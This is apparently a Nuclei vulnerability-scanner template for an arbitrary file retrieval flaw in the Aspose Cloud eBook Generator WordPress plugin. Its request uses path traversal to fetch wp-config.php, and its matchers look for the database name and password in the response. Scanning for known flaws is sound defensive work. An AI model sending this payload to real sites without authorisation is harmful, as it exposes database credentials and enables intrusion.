id: aspose-file-download

info:
  name: Wordpress Aspose Cloud eBook Generator - Arbitrary File Retrieval
  author: 0x_Akoko
  severity: high
  description: The Aspose Cloud eBook Generator WordPress plugin is affected by an arbitrary file retrieval vulnerability.
  reference:
    - https://wpscan.com/vulnerability/7866
  tags: wordpress,wp-plugin,lfi,aspose,ebook

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        part: body
        condition: and

      - type: status
        status:
          - 200
